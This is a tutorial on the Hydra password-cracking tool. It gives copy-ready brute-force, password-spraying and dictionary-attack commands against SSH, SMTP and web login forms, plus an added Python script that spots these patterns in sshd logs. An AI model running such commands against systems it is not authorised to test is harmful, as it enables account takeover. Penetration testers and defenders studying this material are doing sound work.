hydra

Hydra is a widely used password-cracking tool designed to perform brute-force attacks on various authentication services. It is highly efficient and supports a vast range of network protocols. Security professionals and penetration testers use Hydra to test the strength of password-based authentication mechanisms, helping organizations improve their security posture.

Types of Brute Force Attacks with Hydra

Hydra allows attackers and security researchers to conduct different types of brute-force attacks, including:

  • Dictionary Attack: Attempts to find valid username-password combinations using a predefined wordlist.

  • Password Spraying: Tries a single password across multiple usernames to avoid account lockouts.

  • Brute Forcing a Specific User's Password: Continuously tries different passwords for a specific user.

Key Parameters for Using Hydra

To use Hydra effectively, you need to specify the following:

  • The target protocol (SSH, FTP, HTTP, SMTP, etc.).

  • The dictionary files (wordlists) containing usernames and passwords.

  • The target IP or hostname where the attack will be performed.

Below are some common command formats for using Hydra against different services.

Basic Hydra Commands

Brute Forcing a Single User's Password

hydra -s <port> -l <user> -P <password list> <target> <protocol> -V

Example:

hydra -s 22 -l admin -P passwords.txt 192.168.1.1 ssh -V

Password Spraying (Multiple Users, One Password)

hydra -s <port> -L <user list> -p <password> <target> <protocol> -V

Example:

hydra -s 22 -L users.txt -p Welcome123 192.168.1.1 ssh -V

Dictionary Attack (Multiple Users and Passwords)

hydra -s <port> -L <user list> -P <password list> <target> <protocol> -V

Example:

hydra -s 22 -L users.txt -P passwords.txt 10.10.11.8 ssh -V
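The three flag combinations above (-l/-P, -L/-p, -L/-P) leave distinctly shaped trails in the target's authentication log. As an added defender-side example (not part of the original page, and not Hydra's own code), this Python script groups OpenSSH failed-password lines by source IP and labels each source with the attack type it resembles; the log lines and the min_failures threshold are constructed for illustration.

```python
import re

# Matches OpenSSH failed-password lines, with or without "invalid user".
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_failures(lines):
    """Group the usernames from failed-password lines by source IP."""
    failures = {}
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures.setdefault(m.group("ip"), []).append(m.group("user"))
    return failures

def classify_source(usernames, min_failures=5):
    """Label one source's failures by the shape each Hydra mode leaves.
    -l user -P list : many failures, a single username
    -L list -p pass : many failures, every username seen exactly once
    -L list -P list : many failures, several usernames seen repeatedly
    Below min_failures (a constructed threshold) the source is "benign".
    """
    total = len(usernames)
    if total < min_failures:
        return "benign"
    distinct = len(set(usernames))
    if distinct == 1:
        return "single-user brute force"
    if distinct == total:
        return "password spraying"
    return "dictionary attack"

def detect(lines, min_failures=5):
    """Return {source_ip: label} for every source with failed logins."""
    return {ip: classify_source(u, min_failures) for ip, u in parse_failures(lines).items()}

# Constructed sample sshd lines (not captured from a real system).
LINE = "Mar  1 10:%02d:%02d host sshd[1]: Failed password for %s from %s port 4000 ssh2"
SAMPLE_LOG = (
    [LINE % (0, i, "admin", "10.0.0.5") for i in range(6)]
    + [LINE % (1, i, "invalid user " + u, "10.0.0.6")
       for i, u in enumerate(["alice", "bob", "carol", "dave", "eve"])]
    + [LINE % (2, i, u, "10.0.0.7")
       for i, u in enumerate(["alice", "alice", "bob", "bob", "carol", "carol"])]
    + [LINE % (3, 0, "dave", "10.0.0.8")]
)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The labels are heuristics: a spray run with several passwords per user will look like a dictionary attack, so treat the output as triage, not verdict.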

Advanced Hydra Usage

Brute Force Attack on an SMTP Server

hydra -l user@example.com -P passwords.txt smtp://192.168.1.100 -V

HTTP Brute Force Attacks

Hydra can also be used to brute force web application login forms. The http-get-form and http-post-form modules take a target string of three colon-separated fields: the form path, the parameter string with ^USER^ and ^PASS^ placeholders, and a condition that identifies a failed login (a string found on the failure page) or, prefixed with S=, a successful one. The following examples show HTTP GET and POST attacks:

HTTP GET Form Attack

hydra -l admin -P 500-worst-passwords.txt 10.10.29.110 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

HTTP POST Form Attack

hydra -L users.lst -P /path/to/wordlist.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"